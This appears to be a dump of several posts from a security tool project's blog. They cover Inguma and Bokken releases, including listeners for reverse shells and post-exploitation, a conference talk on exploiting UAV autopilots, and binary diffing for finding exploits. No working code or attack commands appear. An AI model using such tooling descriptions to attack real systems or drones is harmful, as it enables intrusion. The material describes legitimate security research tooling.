<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKSkmdlS_XIfKZLDsocly-x1BI9LJfS8mM9OS2RSruhvHYhPa-ebJ-NNPV0C-Ix1SgBCYAinvmv66sibFGzGXzP5d5IVoCWxEejMtNWEx7kfUK2U3ZShcjWQwgnrywBncbyT5usrROz5BZ/s1600/Inguma-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKSkmdlS_XIfKZLDsocly-x1BI9LJfS8mM9OS2RSruhvHYhPa-ebJ-NNPV0C-Ix1SgBCYAinvmv66sibFGzGXzP5d5IVoCWxEejMtNWEx7kfUK2U3ZShcjWQwgnrywBncbyT5usrROz5BZ/s320/Inguma-main.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Look at the <b>new main button</b> that integrates all the common tasks and the simplified toolbar. Also the <b>right panel</b> has been improved by adding expand/collapse buttons as well as filter buttons by Target OS.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwBsVEvg5q0EFgd-UJebYLUl2hQ4I_TX9VdadRMSzeiYPkFKFmU2iUrIbynW3ym51uTxjlzivxTIDPLY9p88Dtwtk-gf0Sv367XQuYcLZ5fRfPd3FwQt2ky3NQ4RNgDOksS5RFU0XY3PX/s1600/Inguma-right_panel.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqwBsVEvg5q0EFgd-UJebYLUl2hQ4I_TX9VdadRMSzeiYPkFKFmU2iUrIbynW3ym51uTxjlzivxTIDPLY9p88Dtwtk-gf0Sv367XQuYcLZ5fRfPd3FwQt2ky3NQ4RNgDOksS5RFU0XY3PX/s320/Inguma-right_panel.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
The <b>Vulnerabilities</b> panel has gained in eye candyness and functionality with the expand/collapse buttons or the "Open with Bokken" menu option.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguYP27Hnz9t04htL37eitc4TdxvHBd8UU9luqfq0evh4pvYlN3TX1zYqA-GHsKi38pRcgH5UNeD7eLsLrxrjfJidPlXDRE-hjc2REAFU3JS1r9gMx4zLhkl2-CIZYET3dXbqGRwUZ51zy9/s1600/Inguma-WebVulns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguYP27Hnz9t04htL37eitc4TdxvHBd8UU9luqfq0evh4pvYlN3TX1zYqA-GHsKi38pRcgH5UNeD7eLsLrxrjfJidPlXDRE-hjc2REAFU3JS1r9gMx4zLhkl2-CIZYET3dXbqGRwUZ51zy9/s320/Inguma-WebVulns.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Most of the work for this release has been focused on the <b>Terminals tab,</b> which has been redesigned and greatly improved.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqVbVhR2OWLbQ5PrvnleVScJwFwjY0vzJ-lG-jQBJHipfRf7_dM_23TS7V9TNi8mI0gL-Wf1pdy-zzu33EYhbsAZ2Uxc_xkAN90pxSHsUktLiOSQHmd_JSy3Ly3PDU7Czten8YgKLXaY1/s1600/Inguma-Terminals.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCqVbVhR2OWLbQ5PrvnleVScJwFwjY0vzJ-lG-jQBJHipfRf7_dM_23TS7V9TNi8mI0gL-Wf1pdy-zzu33EYhbsAZ2Uxc_xkAN90pxSHsUktLiOSQHmd_JSy3Ly3PDU7Czten8YgKLXaY1/s320/Inguma-Terminals.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
As you can see, it now features many buttons to manage terminals and its contents as well as a <b>filesystem panel</b> that integrates perfectly with terminals and the rest of the GUI. From here you can import and load host lists, nmap scans, Inguma modules... and more.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Finally, the new feature that joins all the new changes is what we have called <b>Listeners</b>. By creating listeners you can now connect with your compromised targets and go ahead with post-explotation. :) Let's see how it works.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to listen for reverse connections, or directly connect to a exploited target, simply create a local or remote listener on the toolbar popup.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXcsySnx69UdOXhYMYbrkOFBnAAYY-qM3InPE_FYKCGs0MI6SjG9oCZj7ybtogPA8VDkPQvCbmXyBXbhMOGHdaViE29lysmbGGqa0E4fM0tYQQzc907OBeg3cuy_Gq3yg8VW0iCcnQrLpy/s1600/Inguma-Listsners.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXcsySnx69UdOXhYMYbrkOFBnAAYY-qM3InPE_FYKCGs0MI6SjG9oCZj7ybtogPA8VDkPQvCbmXyBXbhMOGHdaViE29lysmbGGqa0E4fM0tYQQzc907OBeg3cuy_Gq3yg8VW0iCcnQrLpy/s320/Inguma-Listsners.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
You will see the newly created listener in the right panel, under <b>Listeners tab</b>, as well as its status: connected or listening. From here you can disconnect or destroy them using the menu.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Once you have connection with a compromised target you will be able to interact with it on the Terminals tab, but this is still WIP :)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Of course<b> Bokken has been updated</b> to the latest release on the Reversing tab.</div>
<div style="text-align: justify;">
<br /></div>
<h4>
<span style="font-size: large;">
RootedCon 2012</span></h4>
<br />
<div style="text-align: justify;">
On March 1st, 2nd and 3rd the <a href="http://www.rootedcon.es/" target="_blank">RootedCon</a> security event was held in Madrid and one of our developers, <a href="http://twitter.com/hteso" target="_blank">Hugo Teso</a>, was there to talk about Inguma, Bokken and how to use it in security research.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The talk, entitled <a href="http://www.rootedcon.es/index.php/ponencias/#inguma" target="_blank">Inguma 0.5 RedWagon</a>, exposed the ability of Inguma and Bokken to study the security of an uncommon system, in this case <a href="http://en.wikipedia.org/wiki/Unmanned_aerial_vehicle" target="_blank">Unmanned Aerial Vehicles (UAS)</a>, both amateur and comercial ones. For this purpose a special edition of Inguma was coded, featuring <b>UAV Command and Control</b> software, with more protocols added to the network fuzzers among others.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The UAV C&C is an integrated <a href="http://www.waspuav.org/" target="_blank">WASP Ground Control Station</a>, modified to be able to handle different UAV Autopilots (AP), from configuration and compilation to run and control:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGNEVkPYYZcJV2sCh0s9If0agIxSGP6zTNS5XsiK2GS7tC1sd7n6Ssy21nQXxBvimlTuwiGKcBSkNHJKi9D1G38LlhJwJFGnahN1hXMGfRL3MFLrWPUWl46JI1erdP3_mCl855odt9Krhk/s1600/Inguma-RedWagon-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGNEVkPYYZcJV2sCh0s9If0agIxSGP6zTNS5XsiK2GS7tC1sd7n6Ssy21nQXxBvimlTuwiGKcBSkNHJKi9D1G38LlhJwJFGnahN1hXMGfRL3MFLrWPUWl46JI1erdP3_mCl855odt9Krhk/s320/Inguma-RedWagon-main.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
Within the<b> C&C tab</b> many APs can be configured and run, either in SITL or HITL, such as ArduPilot Mega, Paparazzi or WASP. After using the Fuzzers to find vulnerabilities, either the Networking or the C&C tabs can be used to <b>exploit a vulnerable UAV</b>, depending if the vulnerability affects the GCS or the UAV directly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to reverse-engineer the vulnerable AutoPilot or Ground Control Station, Bokken with <a href="http://radare.org/y/" target="_blank">Radare2</a> core was used, so the whole process of vulnerability finding, development and exploiting has been done with <a href="http://inguma.eu/projects/inguma" target="_blank">Inguma</a> and <a href="http://inguma.eu/projects/bokken/" target="_blank">Bokken</a> :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0N7wPI-ksCxdt_zUlhyj4fVJs-h8SBStxH2Eqz2-YUd5Ln3k6itB81SY7cbc4lIbxC4A-CJ84QS3iafmWFwlT8MeIW_slyyj4tEvuKxIi5q9_DBboVBKNpkRoL5cwwmpD_Evt_4Wpr6aO/s1600/Bokken-AP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0N7wPI-ksCxdt_zUlhyj4fVJs-h8SBStxH2Eqz2-YUd5Ln3k6itB81SY7cbc4lIbxC4A-CJ84QS3iafmWFwlT8MeIW_slyyj4tEvuKxIi5q9_DBboVBKNpkRoL5cwwmpD_Evt_4Wpr6aO/s320/Bokken-AP.png" width="320" /></a></div>
<br />
<br />
<div style="text-align: justify;">
<a href="http://www.flickr.com/photos/_rooted/7063441847/in/photostream/" target="_blank">Here</a> you can see some fotos of the talk and some <a href="http://www.slideshare.net/rootedcon/tag/rooted2012" target="_blank">slides</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As you can see, the lack of news doesn't mean lack of activity as we have been really busy :) Stay <a href="https://twitter.com/ingumito" target="_blank">tuned</a> for more updates and upcoming releases!</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com7tag:blogger.com,1999:blog-8320914018667085850.post-24163652907318455142012-01-24T07:50:00.000+01:002012-01-24T07:50:20.753+01:00Bokken 1.6 is more stable and easier to installA month and a half after having <a href="http://ingumadev.blogspot.com/2011/12/and-finally-bokken-15.html">released Bokken 1.5</a>, the Inguma/Bokken team is proud to present a point release to our baby Bokken. The download page can be found <a href="http://inguma.eu/projects/bokken/files" target="_blank">here</a>!<br />
<br />
The main changes in 1.6 are:<br />
<br />
<ul>
<li>Fixed a security bug due to a predictable temporary file creation (a Debian developer reported it the very first day in the archive, yay!).</li>
<li>Fixed some obvious usability issues and crashes when opening new files inside Bokken.</li>
<li>Now Bokken is better prepared at using a system-wide pyew, for example, or being installed somewhere else than your home directory (like distributed as a Debian package :-) ). Some of the images and icons were not working previously.</li>
<li>In the meantime, we <a href="http://inguma.eu/issues/91" target="_blank">started to import Bokken 1.5 into Inguma</a> and quickly realized that: a) some of the UI changes scheduled for next Inguma release could fit into Bokken (read here <i>eating up the top toolbar and menubar</i>), and b) a lot of the migration work could be simplified if we use a simpler frame to embed Bokken in (and thus into Inguma in the long run).</li>
</ul>
<div>
<br /></div>
<div>
This means that when you use Bokken 1.6 you may notice a somewhat unusual menu bar:<br />
<br /></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jDOdMyEIZDwYSt-_7PBzoTOOqUXKLy7dF-7EudxqtqAuvxuqiXTfLmNozztYBck1p_TE6CNbyfvZlYHz9YlsGLqdYS9rDOPCVbNowa3zibfLj-swtzooCWuUI7UEhMOw1em4jmUFdfE0/s1600/Screen+Shot+2012-01-18+at+12.10.07+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="441" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_jDOdMyEIZDwYSt-_7PBzoTOOqUXKLy7dF-7EudxqtqAuvxuqiXTfLmNozztYBck1p_TE6CNbyfvZlYHz9YlsGLqdYS9rDOPCVbNowa3zibfLj-swtzooCWuUI7UEhMOw1em4jmUFdfE0/s640/Screen+Shot+2012-01-18+at+12.10.07+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bokken 1.6 running on Windows 7</td></tr>
</tbody></table>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
Inspired by <a href="http://mypaint.intilinux.com/" target="_blank">MyPaint</a>, we got rid of menu bars (no more File/Edit/... menus) and together with some other buttons in the top toolbar, we replaced them with a big button that comprises most of the previous functionality:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjofX2KffqD71kPVL0fzG2Eurv5lGCo3uh4awhGv05RWBLATZsbY3m5BoBVwLhkARGqyFGusI-ZxEGQrazFR1fcftHjlZscoQ2Vi4UrSCnKPuQ9wGO8b-SXwGaWiqEYIRe7OOKhuRYxFRM8/s1600/Screen+Shot+2012-01-15+at+11.43.27+AM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjofX2KffqD71kPVL0fzG2Eurv5lGCo3uh4awhGv05RWBLATZsbY3m5BoBVwLhkARGqyFGusI-ZxEGQrazFR1fcftHjlZscoQ2Vi4UrSCnKPuQ9wGO8b-SXwGaWiqEYIRe7OOKhuRYxFRM8/s1600/Screen+Shot+2012-01-15+at+11.43.27+AM.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Close capture of the new toolbar in Bokken 1.6<br />
running on Debian Linux wheezy</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
In other order of things, we have been releasing <b>.deb</b> packages since the 1.5 release, together with the rest of dependencies (python-radare2, pyew, etc.), and they have reached the official Debian archive (<a href="http://packages.debian.org/bokken">http://packages.debian.org/bokken</a>). Today we are also proud to present a signed APT repository that you can easily add to your <i>/etc/apt/sources.list</i> in your favorite Debian/Ubuntu/Debian-compatible distribution to follow more closely our development:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;">deb http://deb.inguma.eu/ stable main</span></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: justify;">
For more information and instructions for retrieving the repository signing key, please see the new <a href="http://inguma.eu/projects/bokken/wiki/Debian_installation" target="_blank">installation in Debian and derivatives</a> wiki page.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Enjoy it! And remember: please report to the team any bugs you may find, through <a href="http://inguma.eu/projects/bokken/issues" target="_blank">Redmine</a>, our ticketing system.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-28103372414846151342012-01-23T05:22:00.002+01:002012-01-23T05:22:50.067+01:00Inguma T-Shirts, and updated Inguma server<div style="text-align: justify;">
The Three Wise Men came for Christmas with some presents:<br />
<br />
<ul>
<li>We partnered with a Spanish site to sell Inguma T-shirts.</li>
<li> Our server has duplicated its physical memory! Yay!</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.camisetasfrikis.es/shop/79-598-large/camiseta-inguma.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.camisetasfrikis.es/shop/79-598-large/camiseta-inguma.jpg" /></a></div>
<br />
<br />
The shirts are available through <a href="http://www.camisetasfrikis.es/shop/79-camiseta-inguma.html">Camisetas Frikis</a> site (as far as we know, only in Spanish for the moment), and with every purchase, you will be contributing with 3 € to the project (see below!). If you want to order any and Google Translate is not up to the job, the best thing you can do is to write to info(AT)camisetasfrikis.es with your order or any questions. Their staff will reply to you promptly!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With the yearly server renewal we decided to scratch our pockets and spend more money in memory. The web server has been fighting for resources during the last months with the rest of the processes in the box. Now there're cookies for everyone. :-) Maybe with the T-shirts we will be able to subsidize some of our expenses, coming exclusively from our pockets.<br />
<br />
Thanks for your time and stay tuned for the upcoming release of Bokken 1.6!</div>Enderhttp://www.blogger.com/profile/14709596788489094437noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-32547344324849797952011-12-07T10:55:00.000+01:002011-12-07T21:57:25.394+01:00And finally... Bokken 1.5<div class="separator" style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhns3f3rPGt4PiMAHyA8n-OJBDejsLyQauGPZCl_FjvJth9DlYsmpHOjb1bv6eEhLZ10B1lrY6BHltHF-qZ0uEFdx24B6PzRdG5MRMKsOqDY5NRzB97AAUlYtsz4Zu9jqLKXLVd_eK94RuX/s1600/logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhns3f3rPGt4PiMAHyA8n-OJBDejsLyQauGPZCl_FjvJth9DlYsmpHOjb1bv6eEhLZ10B1lrY6BHltHF-qZ0uEFdx24B6PzRdG5MRMKsOqDY5NRzB97AAUlYtsz4Zu9jqLKXLVd_eK94RuX/s200/logo.png" width="200" /></a></div>
Once the development has finished, <a href="http://radare.org/get/changelog2-0.9-short">radare2 0.9</a> has been released and the <a href="http://bokken.inguma.eu/">project site</a> has been updated, the moment has arrived: <b>Bokken 1.5 is here!</b><br />
<br />
Take a look at the <a href="http://ingumadev.blogspot.com/2011/10/new-release-is-coming.html">previous post</a> to read some of the new features of this release and keep reading to see most of them in detail; for the rest... install Bokken and enjoy them!<br />
<div>
<br /></div>
<div>
As mentioned before, one of the most important features added is the support of radare2 as backend. So now Bokken can work with either <b><a href="http://code.google.com/p/pyew/">Pyew</a> or <a href="http://radare.org/">Radare</a></b>, each one having its own advantages and drawbacks.</div>
<div>
<br /></div>
<div>
Most of the development efforts for this release have gone to <b>improve the GUI</b> in order to make it cleaner and easier to use.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZchP75JWqMQ0BZKQtu-Uw-K5ODDuqjrMhV_jncQQjB3c_8iL8eHGOlssh7tjAFFPc7OOZXr-HxTb7ZQdBuWKdwXyVg0roWG03Lx0roG_cRRI7VcIG32ye9Y_KKbEB2-QtVwNHtuwYohaJ/s1600/bokken-main.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZchP75JWqMQ0BZKQtu-Uw-K5ODDuqjrMhV_jncQQjB3c_8iL8eHGOlssh7tjAFFPc7OOZXr-HxTb7ZQdBuWKdwXyVg0roWG03Lx0roG_cRRI7VcIG32ye9Y_KKbEB2-QtVwNHtuwYohaJ/s400/bokken-main.png" width="400" /></a></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
The <b>disassembly view</b> has gained in interactivity, and now it features, among others:</div>
<div>
<ul>
<li><b>Code navigation</b> by clicking over: functions, basic blocks, address, section names, etc...</li>
<li>Add <b>comments</b>, view and follow <b>xrefs</b> or view <b>opcode information</b> by right-clicking on a code line.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAcc7T_xBduU3ufjOLRoDMILStWY82hXiaXDIo5pbZkxgSGJqhGZLpzsSp2bqtGHhnEfIbucE5m1R_QLSE0w5NCkaGQ5_xGaDoFVXda3wTk17qbp2Uox6qhvLHRZz4SbA4OKp0e1uZZde/s1600/bokken-dasm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAcc7T_xBduU3ufjOLRoDMILStWY82hXiaXDIo5pbZkxgSGJqhGZLpzsSp2bqtGHhnEfIbucE5m1R_QLSE0w5NCkaGQ5_xGaDoFVXda3wTk17qbp2Uox6qhvLHRZz4SbA4OKp0e1uZZde/s400/bokken-dasm.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
The <b>graph tab</b> has been improved mainly if radare backend is used; if so, the graph will show <b>flowgraph</b> or <b>callgraph </b>and popup a <b>xrefs menu</b> if a node is right-clicked.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2gaCpkBHjz9QjrQhKAA_xbTLSUeHH3GmIAJHHyYDyRigLrLID39GAYDtjQNPQHWudJA3nUku4pAV8cmKmI6w_PeXA243g_Ocm2lT1sSKSpfjDI8sNbhyMWAd4QRc6itSMrNKZnf25K6s5/s1600/bokken-flowgraph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2gaCpkBHjz9QjrQhKAA_xbTLSUeHH3GmIAJHHyYDyRigLrLID39GAYDtjQNPQHWudJA3nUku4pAV8cmKmI6w_PeXA243g_Ocm2lT1sSKSpfjDI8sNbhyMWAd4QRc6itSMrNKZnf25K6s5/s400/bokken-flowgraph.png" width="400" /></a></div>
<br /></div>
<div>
Even the <b>hexdump</b> has received some love and now has <b>syntax highlighting</b> and selected bytes will be <b>disassembled</b>.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhloN0l_4GhQwPoPVadYma8yt_JCKOasYR0ArAHRhXrswEpBvHSehteCpH8ASz-s64cuTrZ5AvfZGuji5Qg1_yBBLU67sDz8Z2sH4u9sGaN3JVorzL3rYWQFUh0RJQcYCDrZTJgyUR5hKns/s1600/bokken-hexdump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhloN0l_4GhQwPoPVadYma8yt_JCKOasYR0ArAHRhXrswEpBvHSehteCpH8ASz-s64cuTrZ5AvfZGuji5Qg1_yBBLU67sDz8Z2sH4u9sGaN3JVorzL3rYWQFUh0RJQcYCDrZTJgyUR5hKns/s400/bokken-hexdump.png" width="400" /></a></div>
<br /></div>
<div>
If the radare backend is used, a new tab will be added with <b>extended target information</b> like entry points, symbols, imports, sections and strings.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB6NQ4JGDQqzW05GC6sUBMQRheZsgsETkREEBMjTeiUYPfVB1mubeP0VUHhh8WoUSsY4nJUcUdS4hoD-bYKhyphenhyphen-ISlTTVpHkwYXowOiIWWHCxjxwYoEf6aVgsDI95pAiA5KyjhhMvb1PVRg/s1600/bokken-fileinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB6NQ4JGDQqzW05GC6sUBMQRheZsgsETkREEBMjTeiUYPfVB1mubeP0VUHhh8WoUSsY4nJUcUdS4hoD-bYKhyphenhyphen-ISlTTVpHkwYXowOiIWWHCxjxwYoEf6aVgsDI95pAiA5KyjhhMvb1PVRg/s400/bokken-fileinfo.png" width="400" /></a></div>
<br /></div>
<div>
Do you want to use Bokken to find the exploit of the latest patched vulnerability from your favorite vendor? Congrats! Bokken 1.5 features for the first time a <b>binary diffing</b> plugin that can be used with radare.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhru7ccvmErFtjhHD6zvEf3zrS_66b-W_k4gi8c3ECOirRHMA-hyz78qK3FvZgPW9EYrD2QuhaGoLsaBKQVw-9_ARHSmuYuks8bbYhuyo8RkAOhZPlqOpdfVgEsiWmGcl3HXV3jVCQGAA5o/s1600/bokken-bindiff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhru7ccvmErFtjhHD6zvEf3zrS_66b-W_k4gi8c3ECOirRHMA-hyz78qK3FvZgPW9EYrD2QuhaGoLsaBKQVw-9_ARHSmuYuks8bbYhuyo8RkAOhZPlqOpdfVgEsiWmGcl3HXV3jVCQGAA5o/s400/bokken-bindiff.png" width="400" /></a></div>
<br /></div>
<div>
Other plugins added are:</div>
<div>
<ul>
<li><b>Assembler/Disassembler</b>: create and export assembly code snippets in many architectures.</li>
<li>Visual representation of binary sections.</li>
<li><b>Advanced calculator</b> with many input and output formats.</li>
<li>File magic identification.</li>
</ul>
Finally, if you have problems with x86 assembly, stack inners or other issues, take a look at the RCE cheat sheet included.</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zRyKaoANkRTNPpQd-JV6kmGKssF22rFg_4BSi_Sy6wyvyx5jz7cYta4TTRHYt1pVRl0TE7dlLxyeA66Wy9s7L0k74_wSh0LK989rVHgcHMPfLgBuialSe2mNXPvhSRjtqTTciI-kPAQo/s1600/bokken-cheatsheet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4zRyKaoANkRTNPpQd-JV6kmGKssF22rFg_4BSi_Sy6wyvyx5jz7cYta4TTRHYt1pVRl0TE7dlLxyeA66Wy9s7L0k74_wSh0LK989rVHgcHMPfLgBuialSe2mNXPvhSRjtqTTciI-kPAQo/s400/bokken-cheatsheet.png" width="400" /></a></div>
<br /></div>
<div>
There are many other new hidden features awaiting to be discovered on this release, too much to be mentioned here; take a look at the <a href="http://inguma.eu/projects/bokken/wiki/Wiki">project documentation</a> to discover and learn about them. Now it's time for you to <a href="http://inguma.eu/projects/bokken/files">download</a> and <a href="http://inguma.eu/projects/bokken/wiki/Installation">install</a> :-)</div>
<div>
<br />
Windows installer and debian packages will be available soon but, meanwhile, manual installation is easy and straightforward.<br />
<br /></div>
<div>
We hope you enjoy this release as much as we did working on it and, as always, send us your feedback, bugs, and requests to our mailing list:</div>
<div>
<br /></div>
<div>
bokken-devel at inguma.eu</div>
<div>
<br />
Special thanks for this release go to:<br />
<br />
<ul>
<li>@trufae and @earada for radare2, their help and testing</li>
<li>@zxlain for the OSX testing and encouragement</li>
<li>@huahe for the incredible logo</li>
</ul>
<br />
Thanks and stay tuned (in <a href="http://twitter.com/ingumito">@ingumito</a>)!</div>htesohttp://www.blogger.com/profile/06933489709636162052noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-37437050668818394322011-10-26T20:27:00.002+02:002011-10-27T22:42:11.269+02:00A new release is coming<div style="text-align: left;">Once again it's been a long time since our last update. The team has switched gears and now we are in a sprint to finish a new release of <a href="http://inguma.eu/projects/bokken">Bokken</a>. As you probably know, Bokken is <b>the RCE utility that we use in Inguma</b>, and we have been very busy adding tons of features and polishing the interface.</div><div><br /></div><div>If Bokken 1.0 had 39 commits, for the new release we are near 200, so expect lots of changes, bug fixes and improvements. Let's view some of the major ones.</div><div><br /></div><div>The first thing you will notice is that the GUI has changed dramatically, not just to be adapted to the new features but we also have made many changes in order to make it clearer, more intuitive and easier to use. But a picture is worth a thousand words:</div><div><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfjz4vTfQ6uIiucCXncQ3t7rR-wx7urAL987HucxRoXHhjdkla2SkWPo9uvCHR53YIDkTK03F6LVpYicqU7ZUu6E0darklrzwv0ZymyuWzqbDxMHfNQjaIzwtJnzoiSWnTfjI1Q5Bf4tCA/s1600/bokken-new-gui.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 170px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfjz4vTfQ6uIiucCXncQ3t7rR-wx7urAL987HucxRoXHhjdkla2SkWPo9uvCHR53YIDkTK03F6LVpYicqU7ZUu6E0darklrzwv0ZymyuWzqbDxMHfNQjaIzwtJnzoiSWnTfjI1Q5Bf4tCA/s320/bokken-new-gui.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5668196196304574914" /></a><br /><div><i>"Coming soon"</i>,<i> "WIP"</i> or <i>"for the next release"</i> are expressions that the Inguma team doesn't like, so 